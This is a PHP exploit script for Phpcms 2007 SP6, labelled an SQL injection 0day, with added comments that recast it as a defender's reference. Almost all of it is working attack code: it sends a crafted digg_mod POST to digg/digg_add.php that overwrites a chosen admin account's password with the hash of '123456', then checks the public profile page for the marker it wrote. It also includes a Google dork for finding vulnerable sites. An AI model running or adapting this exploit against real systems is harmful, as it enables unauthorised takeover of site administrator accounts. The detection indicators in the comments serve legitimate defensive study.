PhpCms 2007 SP6 SQL injection 0day
#!/usr/bin/php
<?php
// Published exploit listing for Phpcms 2007 SP6 (historical). Read it as a
// defender's reference: the script abuses an SQL query behind the `digg_mod`
// POST field of `digg/digg_add.php` (the value is spliced in unquoted, see the
// `admin,(SELECT` prefix below) to overwrite the targeted admin account's
// password hash and e-mail address, then confirms the change by fetching the
// public member profile page and looking for the marker it wrote.
//
// Detection / forensic indicators visible in this code:
//   - a POST to <path>digg/digg_add.php whose `digg_mod` value carries SQL
//     with `/**/` used in place of spaces, `0x` hex string literals and an
//     encoded `#` (`%23`);
//   - a non-standard `CLIENT-IP` request header holding a bare Unix timestamp;
//   - an admin row whose password hash is e10adc3949ba59abbe56e057f20f883e
//     (the MD5 of "123456", matching the success message below) and whose
//     e-mail field reads `puret_t` with showemail=1.
// Mitigation is the standard one: the vulnerable script must not splice
// `digg_mod` into SQL; accept only a fixed set of expected values for it and
// bind anything else as a query parameter.

// Banner (runtime output, left verbatim).
print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 reset admin password exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ ');

/**
 * works regardless of php.ini settings
 */
// Usage guard: host, path and admin login name are required on the command line.
if ($argc < 4) {
    print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user host: target server (ip/hostname) path: path to phpcms user: admin login name Example: php '.$argv[0].' localhost /phpcms/ admin +---------------------------------------------------------------------------+ ');
    exit;
}

// 7 = E_ERROR | E_WARNING | E_PARSE; notices are hidden.
error_reporting(7);
// No script time limit, so a slow or silent target does not abort the run.
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$user = $argv[3];
// Public profile page of the targeted account; fetched below to verify the change.
$url = 'http://'.$host.$path.'member/member.php?username='.$user;

// Fire the injection (the HTTP response is discarded), then check whether the
// profile page now shows the e-mail marker the payload wrote.
send();

if (strpos(file_get_contents($url), 'puret_t') !== false)
    exit("Expoilt Success!\nAdmin New Password:\t123456\n");
else
    exit("Exploit Failed!\n");

/**
 * Builds and sends the raw HTTP POST carrying the injection and returns the
 * raw response text. Reads $host, $path and $user from global scope.
 *
 * The two bin2hex() parts become MySQL hex string literals that set password,
 * email and showemail on the row matching $user and comment out the rest of
 * the statement with `#`. The distinctive request-body tokens (`/**/`, `0x`
 * literals, `%23`) are what a WAF/IDS rule for this exploit should key on.
 *
 * Note: the fsockopen() result is never checked. On connection failure
 * fputs() is called on `false` (a warning under error_reporting(7)), the read
 * loop is skipped by the `$fp &&` guard, '' is returned and the caller reports
 * "Exploit Failed!".
 */
function send()
{
    global $host, $path, $user;
    $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1\',password=\'e10adc3949ba59abbe56e057f20f883e\',email=\'puret_t\',showemail=1 WHERE username=\''.$user.'\'#').'/**/AS/**/credit,0x'.bin2hex('\' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6';
    $message = "POST ".$path."digg/digg_add.php HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    // Non-standard header carrying a timestamp rather than an address — an easy
    // thing to alert on; why the exploit sends it is not evident from this code.
    $message .= "CLIENT-IP: ".time()."\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    // Plain TCP to port 80, no TLS, no timeout, no return-value check.
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);
    return $resp;
}
?>